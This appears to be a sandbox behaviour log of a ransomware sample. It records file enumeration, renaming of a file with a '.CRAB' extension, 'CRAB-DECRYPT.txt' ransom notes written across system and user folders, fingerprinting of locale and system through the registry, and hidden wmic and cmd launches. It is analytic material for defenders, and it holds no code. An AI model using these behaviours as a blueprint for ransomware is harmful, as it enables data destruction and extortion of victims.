Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\yDTOs3XgmnBA7E33YPzb\dp2 xk0V_8T-w0_PfnT\FP5YUa2nFPMs.jpg	type = file_attributes	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\yDTOs3XgmnBA7E33YPzb\dp2 xk0V_8T-w0_PfnT\GOOFQ22cgu.wav	type = file_attributes	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\yDTOs3XgmnBA7E33YPzb\dp2 xk0V_8T-w0_PfnT\JaAUuMCO3cS.m4a	type = file_attributes	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\yDTOs3XgmnBA7E33YPzb\dp2 xk0V_8T-w0_PfnT\kgX4.flv	type = file_attributes	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\yDTOs3XgmnBA7E33YPzb\dp2 xk0V_8T-w0_PfnT\LhBc _PrF.ppt	type = file_attributes	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\yDTOs3XgmnBA7E33YPzb\I4RoqHAFyJKCzMDS_.mkv	type = file_attributes	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\yDTOs3XgmnBA7E33YPzb\jkbwIB639vo5.gif	type = file_attributes	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\yDTOs3XgmnBA7E33YPzb\LrZ9JSM4ynVnONVHq.wav	type = file_attributes	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\yDTOs3XgmnBA7E33YPzb\NlX4k_mNAGv84.swf	type = file_attributes	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\yDTOs3XgmnBA7E33YPzb\ry-yusa93pJEt0f7.mp3	type = file_attributes	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\yDTOs3XgmnBA7E33YPzb\WAYwwcRHKyM5aOVAri7I.odp	type = file_attributes	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\yDTOs3XgmnBA7E33YPzb\X6 hWpS.png	type = file_attributes	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\yMwD01eZD.bmp	type = file_attributes	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\ZVazYW1Y4JPIe.m4a	type = file_attributes	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\zxggaoU.mp4	type = file_attributes	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\_bssIabjo1Er7s61_2.rtf	type = file_attributes	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\08W494ygrrR2UQM3xN.pptx	type = file_attributes	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\2SBlngwiU-8Y.docx	type = file_attributes	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\3jDiw_Nhsj.xlsx	type = file_attributes	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\45cjUXPsWNUYZZ.csv	type = file_attributes	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\4Nyie1u9CnS\PrFPOmbd.pps	type = file_attributes	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\4Nyie1u9CnS\RRYIeD.ots	type = file_attributes	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\4Nyie1u9CnS\wRuHiSpE6u4.csv	type = file_attributes	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\aNZm9r-6.xlsx	type = file_attributes	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\bBmcaUJi9aF\I5i-H.csv	type = file_attributes	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\bBmcaUJi9aF\LjtcV9W_leTggwnha.ods	type = file_attributes	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\bBmcaUJi9aF\WV5O6EW.doc	type = file_attributes	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\bBmcaUJi9aF\x5ZPZus4kM.doc	type = file_attributes	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\CV695_5vq3Zzri.pptx	type = file_attributes	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\DyqOvvnqQfnopF.pptx	type = file_attributes	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\EPBBoe7Ro1v0ShX.docx	type = file_attributes	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\et5e5Za ixxXB9f30.xlsx	type = file_attributes	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\HCVI7ZX2o.pptx	type = file_attributes	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\ihfa5ABiYSL\6ha0-v.rtf	type = file_attributes	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\ihfa5ABiYSL\E8f8L-CRfhlmsWwyWOn.ods	type = file_attributes	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\ihfa5ABiYSL\IMHhzPfLf4hL63ueKPIt.docx	type = file_attributes	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\ihfa5ABiYSL\LqdrBI-83PZ4gulxyi.ods	type = file_attributes	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\ihfa5ABiYSL\n9f1X\bx25n_zEWz.xlsx	type = file_attributes	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\ihfa5ABiYSL\n9f1X\cmJZOujcf.xls	type = file_attributes	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\ihfa5ABiYSL\n9f1X\e4IA\19Yvp6ANDVIkDiFIG.doc	type = file_attributes	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\ihfa5ABiYSL\n9f1X\e4IA\5h7CA4lK26Fq5Gv.ods	type = file_attributes	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\ihfa5ABiYSL\n9f1X\e4IA\eVHpoKHeTyOL0r\KfXa.ods	type = file_attributes	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\ihfa5ABiYSL\n9f1X\e4IA\eVHpoKHeTyOL0r\mUQn.ppt	type = file_attributes	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\ihfa5ABiYSL\n9f1X\e4IA\eVHpoKHeTyOL0r\PBEoEsrTJ9eabu.pdf	type = file_attributes	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\ihfa5ABiYSL\n9f1X\e4IA\eVHpoKHeTyOL0r\PBRm9gO_BYv34r.docx	type = file_attributes	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\ihfa5ABiYSL\n9f1X\e4IA\eVHpoKHeTyOL0r\QAK6u0jBm85H.pps	type = file_attributes	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\ihfa5ABiYSL\n9f1X\e4IA\eVHpoKHeTyOL0r\wOPqVqBS4.ots	type = file_attributes	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\ihfa5ABiYSL\n9f1X\e4IA\eVHpoKHeTyOL0r\XEXg3o.pdf	type = file_attributes	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\ihfa5ABiYSL\n9f1X\e4IA\L-9rWH3g90rvx6n.odp	type = file_attributes	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\ihfa5ABiYSL\n9f1X\e4IA\Odz5x6Cb_LLwBi.pptx	type = file_attributes	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\ihfa5ABiYSL\n9f1X\e4IA\S6BPLG0C-Vmy7in3T.xlsx	type = file_attributes	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\ihfa5ABiYSL\n9f1X\EwV15du8z.pptx	type = file_attributes	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\ihfa5ABiYSL\n9f1X\gt0JBiTNv3SX i75V.pdf	type = file_attributes	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\ihfa5ABiYSL\n9f1X\hzs6jyNVZgY-kQaIa.ods	type = file_attributes	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\ihfa5ABiYSL\n9f1X\j_3PZxyiwO8w.rtf	type = file_attributes	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\ihfa5ABiYSL\n9f1X\RTDYFjRJhM5Cy.ots	type = file_attributes	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\ihfa5ABiYSL\n9f1X\s t6meCIdADoLbUSwk6.pps	type = file_attributes	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\ihfa5ABiYSL\n9f1X\ZD5GD\aX6Me_QE1X.pdf	type = file_attributes	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\ihfa5ABiYSL\n9f1X\ZD5GD\KVmrnWSNH.pps	type = file_attributes	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\ihfa5ABiYSL\n9f1X\ZD5GD\qJDSpaff7iaDch.pps	type = file_attributes	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\ihfa5ABiYSL\n9f1X\ZD5GD\qW66q 1yIljY0F4.pptx	type = file_attributes	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\ld_62HyoscOI325O.xlsx	type = file_attributes	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\Mkb YyyyeqwKZoQQHy.ods	type = file_attributes	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\Ohl4MR.xlsx	type = file_attributes	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\Outlook Files\voeimd@djhreuu.uhd.pst	type = file_attributes	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\P6X_pXpgAoA1Ra.pptx	type = file_attributes	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\spA-_rjrgAuP4BLMuw.docx	type = file_attributes	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\sRLr2c5BWRPE.docx	type = file_attributes	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\VtAGTwu.docx	type = file_attributes	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\_iy0CK cncf.csv	type = file_attributes	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Favorites\Links\Suggested Sites.url	type = file_attributes	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Favorites\Links\Web Slice Gallery.url	type = file_attributes	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Favorites\Microsoft Websites\IE Add-on site.url	type = file_attributes	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Favorites\Microsoft Websites\IE site on Microsoft.com.url	type = file_attributes	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Favorites\Microsoft Websites\Microsoft At Home.url	type = file_attributes	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Favorites\Microsoft Websites\Microsoft At Work.url	type = file_attributes	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Favorites\Microsoft Websites\Microsoft Store.url	type = file_attributes	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Favorites\MSN Websites\MSN Autos.url	type = file_attributes	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Favorites\MSN Websites\MSN Entertainment.url	type = file_attributes	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Favorites\MSN Websites\MSN Money.url	type = file_attributes	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Favorites\MSN Websites\MSN Sports.url	type = file_attributes	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Favorites\MSN Websites\MSN.url	type = file_attributes	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Favorites\MSN Websites\MSNBC News.url	type = file_attributes	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Favorites\Windows Live\Get Windows Live.url	type = file_attributes	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Favorites\Windows Live\Windows Live Gallery.url	type = file_attributes	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Favorites\Windows Live\Windows Live Mail.url	type = file_attributes	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Favorites\Windows Live\Windows Live Spaces.url	type = file_attributes	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Music\8n5aqpCDq_A.wav	type = file_attributes	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Music\bYYPbao200\1unio5SG06C_y d Xnw.wav	type = file_attributes	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Music\bYYPbao200\ALP_3enOnWOL8 iNu0k.wav	type = file_attributes	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Music\bYYPbao200\AP2Td3Un4SX\3n-hfMjTrkH.wav	type = file_attributes	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Music\bYYPbao200\AP2Td3Un4SX\cHVaLnYjymB.mp3	type = file_attributes	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Music\bYYPbao200\AP2Td3Un4SX\HHRphAnegwv.wav	type = file_attributes	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Music\bYYPbao200\AP2Td3Un4SX\icjLe.m4a	type = file_attributes	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Music\bYYPbao200\AP2Td3Un4SX\Kn_tmM6zw3.mp3	type = file_attributes	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Music\bYYPbao200\AP2Td3Un4SX\uM3BQJ8dxr7D.mp3	type = file_attributes	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Music\bYYPbao200\AP2Td3Un4SX\Ut43X\aDo6beuoWUshkJscLN.m4a	type = file_attributes	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Music\bYYPbao200\AP2Td3Un4SX\Ut43X\ixvZieErLXMX.m4a	type = file_attributes	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Music\bYYPbao200\AP2Td3Un4SX\Ut43X\o5mx 1k.mp3	type = file_attributes	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Music\bYYPbao200\AP2Td3Un4SX\Ut43X\w-EbBm2RRAB-8PrlGt8u.mp3	type = file_attributes	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Music\bYYPbao200\AP2Td3Un4SX\Ut43X\xYTuu-kXIKL5LgiaEv.mp3	type = file_attributes	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Music\bYYPbao200\CS3gDGLDtVe2M-uw.mp3	type = file_attributes	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Music\bYYPbao200\LyPQjV7PO96e.mp3	type = file_attributes	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Music\bYYPbao200\PPSeV.m4a	type = file_attributes	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Music\bYYPbao200\xCkQAtWjjq975oK9k6\xCSQML_l5A\2NCRqm0mX6PHLyeD.mp3	type = file_attributes	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Music\bYYPbao200\xCkQAtWjjq975oK9k6\xCSQML_l5A\3TQ_ma.wav	type = file_attributes	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Music\bYYPbao200\xCkQAtWjjq975oK9k6\xCSQML_l5A\ceyjelW3O13RpbDjDa.mp3	type = file_attributes	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Music\bYYPbao200\xCkQAtWjjq975oK9k6\xCSQML_l5A\FgwN2ObhM.mp3	type = file_attributes	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Music\bYYPbao200\xCkQAtWjjq975oK9k6\xCSQML_l5A\fJ1WwAMKbwQ2.wav	type = file_attributes	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Music\bYYPbao200\xCkQAtWjjq975oK9k6\xCSQML_l5A\GZFhWL9G.m4a	type = file_attributes	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Music\bYYPbao200\xCkQAtWjjq975oK9k6\xCSQML_l5A\VVQF1K6etogvy10qk.mp3	type = file_attributes	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Music\bYYPbao200\xCkQAtWjjq975oK9k6\xCSQML_l5A\W8BbZpX N5yyTX\71dtLIqFptp6t.mp3	type = file_attributes	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Music\bYYPbao200\xCkQAtWjjq975oK9k6\xCSQML_l5A\W8BbZpX N5yyTX\FoYg3B8-Vkug_.mp3	type = file_attributes	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Music\bYYPbao200\xCkQAtWjjq975oK9k6\xCSQML_l5A\W8BbZpX N5yyTX\PRSTXAg7VrJGp3.mp3	type = file_attributes	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Music\bYYPbao200\xCkQAtWjjq975oK9k6\xCSQML_l5A\W8BbZpX N5yyTX\Zkl31vPQAP.m4a	type = file_attributes	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Music\iu1GhB.m4a	type = file_attributes	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Music\vKIdu\LQ2R1 pocm.m4a	type = file_attributes	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Music\vKIdu\SVWbxUJ-ugmt.wav	type = file_attributes	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Music\vKIdu\tXVdj.m4a	type = file_attributes	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Music\vKIdu\Z9FFFe9.mp3	type = file_attributes	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\ntuser.dat.LOG1	type = file_attributes	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf	type = file_attributes	1	Fn
Move	C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\aZfX8HXaYp_3H -la-ai.gif.CRAB	source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\aZfX8HXaYp_3H -la-ai.gif	1	Fn
Read	C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\SystemCertificates\My\\CRAB-DECRYPT.txt	size = 1048576, size_out = 20635	1	Fn
Read	C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\SystemCertificates\My\CTLs\\CRAB-DECRYPT.txt	size = 1048576, size_out = 10	1	Fn
Write	C:\Program Files\\CRAB-DECRYPT.txt	size = 4290	1	Fn Data
Write	C:\Program Files\Microsoft SQL Server Compact Edition\\CRAB-DECRYPT.txt	size = 4290	1	Fn Data
Write	C:\Program Files\Microsoft SQL Server Compact Edition\v3.5\\CRAB-DECRYPT.txt	size = 4290	1	Fn Data
Write	C:\Program Files\Microsoft SQL Server Compact Edition\v3.5\Desktop\\CRAB-DECRYPT.txt	size = 4290	1	Fn Data
Write	C:\Program Files (x86)\\CRAB-DECRYPT.txt	size = 4290	1	Fn Data
Write	C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\SystemCertificates\\CRAB-DECRYPT.txt	size = 4290	1	Fn
Write	C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\SystemCertificates\My\\CRAB-DECRYPT.txt	size = 4290	1	Fn
Write	C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\SystemCertificates\My\Certificates\\CRAB-DECRYPT.txt	size = 4290	1	Fn
Write	C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\SystemCertificates\My\CRLs\\CRAB-DECRYPT.txt	size = 4290	1	Fn
Write	C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\SystemCertificates\My\CTLs\\CRAB-DECRYPT.txt	size = 4290	1	Fn
Write	C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\SystemCertificates\My\\CRAB-DECRYPT.txt	size = 20640	1	Fn
Write	C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\SystemCertificates\My\\CRAB-DECRYPT.txt	size = 256	2	Fn
Write	C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\SystemCertificates\My\\CRAB-DECRYPT.txt	size = 8	1	Fn
Write	C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\SystemCertificates\My\CTLs\\CRAB-DECRYPT.txt	size = 16	1	Fn
Write	C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\SystemCertificates\My\CTLs\\CRAB-DECRYPT.txt	size = 256	2	Fn
Write	C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\SystemCertificates\My\CTLs\\CRAB-DECRYPT.txt	size = 8	1	Fn
Write	C:\Users\Default\AppData\Roaming\Microsoft\SystemCertificates\\CRAB-DECRYPT.txt	size = 4290	1	Fn
Write	C:\Users\Default\AppData\Roaming\Microsoft\SystemCertificates\My\\CRAB-DECRYPT.txt	size = 4290	1	Fn
Write	C:\Users\Default\AppData\Roaming\Microsoft\SystemCertificates\My\Certificates\\CRAB-DECRYPT.txt	size = 4290	1	Fn
Write	C:\Users\Default\AppData\Roaming\Microsoft\SystemCertificates\My\CRLs\\CRAB-DECRYPT.txt	size = 4290	1	Fn
Write	C:\Users\Default\AppData\Roaming\Microsoft\SystemCertificates\My\CTLs\\CRAB-DECRYPT.txt	size = 4290	1	Fn
For performance reasons, the remaining 2060 entries are omitted. The remaining entries can be found in glog.xml.

Registry (26)

Operation	Key	Additional Information	Count	Logfile
Open Key	HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\Tcpip\Parameters	-	1	Fn
Open Key	HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	-	2	Fn
Open Key	HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\Tcpip\Parameters	-	1	Fn
Open Key	HKEY_CURRENT_USER\Control Panel\International	-	1	Fn
Open Key	HKEY_CURRENT_USER\Keyboard Layout\Preload	-	2	Fn
Open Key	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion	-	1	Fn
Open Key	HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	-	2	Fn
Open Key	HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\Tcpip\Parameters	-	1	Fn
Open Key	HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	-	2	Fn
Read Value	HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\Tcpip\Parameters	value_name = Domain, data = 0	1	Fn
Read Value	HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	value_name = ProcessorNameString, data = 73	1	Fn
Read Value	HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	value_name = Identifier, data = 73	1	Fn
Read Value	HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\Tcpip\Parameters	value_name = Domain, data = 0	1	Fn
Read Value	HKEY_CURRENT_USER\Control Panel\International	value_name = LocaleName, data = 101	1	Fn
Read Value	HKEY_CURRENT_USER\Keyboard Layout\Preload	value_name = 1, data = 48	1	Fn
Read Value	HKEY_CURRENT_USER\Keyboard Layout\Preload	value_name = 2, data = 48	1	Fn
Read Value	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion	value_name = productName, data = 87	1	Fn
Read Value	HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	value_name = ProcessorNameString, data = 73	1	Fn
Read Value	HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	value_name = Identifier, data = 73	1	Fn
Read Value	HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\Tcpip\Parameters	value_name = Domain, data = 0	1	Fn
Read Value	HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	value_name = ProcessorNameString, data = 73	1	Fn
Read Value	HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	value_name = Identifier, data = 73	1	Fn

Process (2)

Operation	Process	Additional Information	Success	Count	Logfile
Create	C:\Windows\system32\wbem\wmic.exe	show_window = SW_HIDE		1	Fn
Create	cmd.exe	show_window = SW_HIDE		1	Fn

Module (1984)

Operation	Module	Additional Information	Count	Logfile
Load	KERNEL32.dll	base_address = 0x75fd0000	1	Fn
Load	USER32.dll	base_address = 0x763e0000	1	Fn
Load	ADVAPI32.dll	base_address = 0x760e0000	1	Fn
Load	SHELL32.dll	base_address = 0x76920000	1	Fn
Load	CRYPT32.dll	base_address = 0x75a60000	1	Fn
Load	WININET.dll	base_address = 0x76570000	1	Fn
Get Handle	c:\windows\syswow64\ntdll.dll	base_address = 0x77e30000	6	Fn
Get Handle	c:\windows\syswow64\advapi32.dll	base_address = 0x760e0000	939	Fn
Get Filename	-	process_name = c:\windows\syswow64\svchost.exe, file_name_orig = C:\Windows\SysWOW64\svchost.exe, size = 256	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = CreateMutexW, address_out = 0x75fe424c	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetDriveTypeW, address_out = 0x75fe418b	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = VerSetConditionMask, address_out = 0x77ea92b9	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetTickCount, address_out = 0x75fe110c	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = InitializeCriticalSection, address_out = 0x77e62c42	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = OpenProcess, address_out = 0x75fe1986	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetSystemDirectoryW, address_out = 0x75fe5063	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = Sleep, address_out = 0x75fe10ff	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = TerminateProcess, address_out = 0x75ffd802	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = VerifyVersionInfoW, address_out = 0x75ffd423	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = WaitForMultipleObjects, address_out = 0x75fe4220	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = DeleteCriticalSection, address_out = 0x77e645f5	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = lstrcatA, address_out = 0x76002b7a	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = MultiByteToWideChar, address_out = 0x75fe192e	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = CreateThread, address_out = 0x75fe34d5	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = Process32FirstW, address_out = 0x76008baf	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = Process32NextW, address_out = 0x7600896c	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = CreateToolhelp32Snapshot, address_out = 0x7600735f	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = LeaveCriticalSection, address_out = 0x77e52270	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = EnterCriticalSection, address_out = 0x77e522b0	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = FindFirstFileW, address_out = 0x75fe4435	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = lstrcpyW, address_out = 0x76003102	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = lstrcmpW, address_out = 0x75fe5929	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = MoveFileW, address_out = 0x75ff9af0	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = FindClose, address_out = 0x75fe4442	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = FindNextFileW, address_out = 0x75fe54ee	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = SetFileAttributesW, address_out = 0x75ffd4f7	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetNativeSystemInfo, address_out = 0x75ff10b5	1	Fn
